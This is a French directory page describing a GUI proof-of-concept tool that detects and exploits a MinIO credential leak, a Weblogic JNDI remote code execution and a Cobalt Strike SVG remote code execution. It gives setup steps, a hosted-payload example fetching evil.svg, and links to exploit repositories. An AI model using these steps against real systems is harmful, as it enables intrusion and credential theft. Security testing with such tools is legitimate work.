Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Gui-poc-test — Un outil de test pour CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Outils/GitHubGitHub/romanc9/gui-poc-test
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionDéveloppement de Charges Utiles
GitHubromanc9/gui-poc-test

Gui-poc-test

Un outil de test pour CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Voir le dépôt
22il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Gui-poc-test

Un outil de test pour CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Outil de détection et d'exploitation graphique de ces trois vulnérabilités

Remarques

  1. L'exécution du jar nécessite Java 8

  2. Conçu pour une cible unique, ne convient pas au scan multi-IP

  3. Lors de l'empaquetage, l'exploitation de la vulnérabilité Weblogic nécessite de référencer wlfullclient.jar, à ajouter manuellement

Utilisation

java -jar Gui-poc-test.jar

Méthode d'utilisation : deux boutons : détection et exploitation. Des indications dans l'interface de l'outil sont fournies selon la vulnérabilité.

MinIO - Fuite d'informations :

Saisir la cible, pas besoin de port, par défaut 9000, modifiable, voir source GuiDemo.java:line144

Affiche MINIO_ROOT_USER et MINIO_ROOT_PASSWORD, etc.

image

Weblogic RCE

Saisir l'IP cible, le port, l'adresse du serveur LDAP

Détection :

image

Remarque : l'exploitation nécessite de monter un serveur LDAP (réseau public)

  • Outil d'exploitation jndi : utilisez JNDIExploit.jar pour lancer les services LDAP et WEB, voir https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. Après avoir sélectionné la vulnérabilité, la méthode d'auto-vérification s'affiche par défaut : dans l'écouteur CS, insérez le code de détection pour vérifier si la vulnérabilité est présente.
  2. Prérequis pour l'exploitation : avoir déjà récupéré le cheval de Troie (exe) de la cible localement.
  3. Environnement requis : Windows, Python 3, installer frida-tools via pip3.
  4. Python doit être dans la variable d'environnement.
  5. Monter un serveur pour héberger le fichier svg, le jar, accessible par la cible.
  6. Saisir le chemin absolu de l'exe et l'adresse du svg, séparés par un espace, cliquer sur exécuter pour contre-attaquer.
  7. Le contenu du jar est personnalisable, l'exemple montre l'ouverture de la calculatrice.
  8. Le nom du cheval de Troie par défaut est beacon, modifiable, voir source cve_2022_39197.py:line28

Exemple de payload : beacon.exe http://127.0.0.1:4444/evil.svg

Résultat : l'exécutable tourne sur Windows, le client CS sur Mac se connecte.

Simultanément, le jar est exécuté côté CS, ouvrant la calculatrice.

image

Sur Windows, l'adresse d'accès CS est enregistrée.

image

Références

Principe : https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

Correctif CS : https://github.com/burpheart/CVE-2022-39197-patch

Télécharger l’outil